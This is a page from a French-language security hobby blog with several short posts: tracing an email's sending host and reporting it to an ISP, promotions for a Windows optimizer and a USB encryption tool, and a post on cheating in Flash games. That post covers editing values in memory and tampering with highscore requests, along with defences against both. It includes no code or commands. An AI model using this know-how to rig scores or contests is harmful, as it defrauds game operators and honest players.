There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

some usefull websites foe email backtracking
http://www.sendanonymousemail.net/

Partager cet article
Repost0
19 juillet 2011 2 19 /07 /juillet /2011 03:25

7 Mz Optimizer is a complete system optimization suite for your Microsoft Windows 7 operating systems. With Mz 7 Optimizer your computer will be faster, more stable and more secure. Easily customize your computer to suit your needs! The program’s main interface is divided into a left sidebar, which links to the categories of adjustments and performance tuning, or the security of Internet and other optimization options offered by the software.

 

mz 7 optimizer Tweak Optimize Windows7 for Better Performance: Mz7 Optimizer Free

Here are some key features:

  • Boosts PC performance
  • Speed up games
  • Tweak and personalize Windows
  • Increase system security
  • Smart memory & processor management
  • Increase network performance and download speeds
  • Optimize & backup your registry
  • Remove unused and temporary files from your system
  • Configure Windows startup and services
  • Manage power plans for laptops/netbooks
  • Schedule shutdowns
  • Much more…

Supported Operating Systems: Windows 7 (32bit & 64bit support)

Links: Download Mz7 Optimizer | Mz7 Optimizer Homepage

Partager cet article
Repost0
19 juillet 2011 2 19 /07 /juillet /2011 03:08

Sauvegarde USB vous permet de crypter et de protéger les données sensibles de passe sur votre clé USB. Vous pouvez sélectionné un ou plusieurs dossiers à crypter et choisissez en toute sécurité supprimer l'original (non chiffrés) des fichiers avec le destructeur de fichiers intégré.

 

usbsafeguard protéger USB crypter le mot de passe Protéger clé USB avec Password Lock

Verrouillez votre clé USB avec mot de passe: USB de sauvegarde

ProtectyourUSBFlashDriveContentswithPasswordLock Protéger clé USB avec Password Lock

Il suffit de glisser et déposer des fichiers et dossiers à protéger rapidement vos documents sensibles, puis entrez un mot de passe pour crypter et décrypter les fichiers que vous voulez protéger des regards indiscrets.

LockyourUSBPenDrivewithPasswordUSBSafeguard Protéger clé USB avec Password Lock

Le programme inclut également une fonctionnalité de navigation Handy Safe qui vous permet de lancer Internet Explorer sans laisser aucune trace sur Internet sur l'ordinateur hôte. Les autres caractéristiques comprennent un clavier à l'écran pour la saisie de mot de passe sécurisé et l'essuyage d'espace libre.

Télécharger USB Safeguard: http://usbsafeguard.altervista.org/

Sauvegarde USB utilise un cryptage 256 bits AES pour protéger votre date. Le programme n'est pas installé sur votre PC, il fonctionne directement à partir de votre clé USB.

Partager cet article
Repost0
5 juillet 2011 2 05 /07 /juillet /2011 21:31
Vendredi 1 avril 2011

indexVoici une vidéo très intéressante qui va vous apprendre à tricher avec n’importe quel jeu en Flash. Le hack est basé sur la modification en mémoire vive des valeurs du processus dans lequel est exécuté le jeu.

Pour les moins techos, je vais tenter une explication. Pour shématiser, à chaque fois que vous jouer votre navigateur va créer un processus pour faire tourner votre jeu. Ce processus a besoin de 2 ressources: de la mémoire pour stocker ses données (le score, les maps…) et de temps de calcul. La première est fournie par la mémoire vive et la seconde par le processeur de votre machine.


Comme toutes les variables sont stockées en mémoire vive, vous pouvez logiquement retrouver votre score ou vos ressources dans cet espace et donc les modifier !

La vidéo


la video est en anglais


 

Comment se prémunir contre ce genre d’attaque ?

Et bien le hacks se base sur la comparaison et l’évolution des valeurs en mémoire. Si vous chiffrez les valeurs celà va devenir bien plus compliqué. En effet le tricheur va devoir trouver quel est l’algorithme de chiffrage et donc décompiler et analyser votre code. Vous vous dites peine perdue ? Non, pas du tout à chaque attaque sa parade. Il existe des offuscateur de code qui rendent la lecture extrêmement pénible à un humain mais pour un ordinateur.

D’autres attaques plus classiques existent, comme par exemple l’analyse des échanges entre votre jeu et ses serveurs. Des extensions firefox, comme par exemple Tamper Data, vous permettent de savoir quelles URL ont été appellées et avec quels paramètres.

Lorsque vous enregistrez votre score dans les highscore: votre jeu va soumettre une requête à un serveur.  Et bien si l’application qui enregistre les scores n’est pas suffisament sécurisée, il suffit d’attaquer cette partie, pour se voir dans le tableau des high score sans avoir jouer une seule fois…

Celà peut sembler anodin comme attaque, après tout ce ne sont que des scores. Mais imaginez le cas d’un jeu concours avec des gains, dont le gagnant est celui qui fera le meilleur score ? Vous avez un sérieux  problème. La sécurité est un point important à ne pas négliger, même lorsqu’on évolue dans le domaine du divertissement !!

Partager cet article
Repost0

Présentation

  • : tunisian-hackers
  • : Hacker est à l'origine un mot anglais signifiant bricoleur, bidouilleur, utilisé pour désigner en informatique les programmeurs astucieux et débrouillards. Plus généralement il désigne le possesseur d'une connaissance technique lui permettant de modifier un objet ou un mécanisme pour lui faire faire autre chose que ce qui était initialement prévu.
  • Contact

Translate this blog

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified


this widget by www.AllBlogTools.com

Recherche

Your IP Is:

 

Compteur Tunisian-Hackers

Liens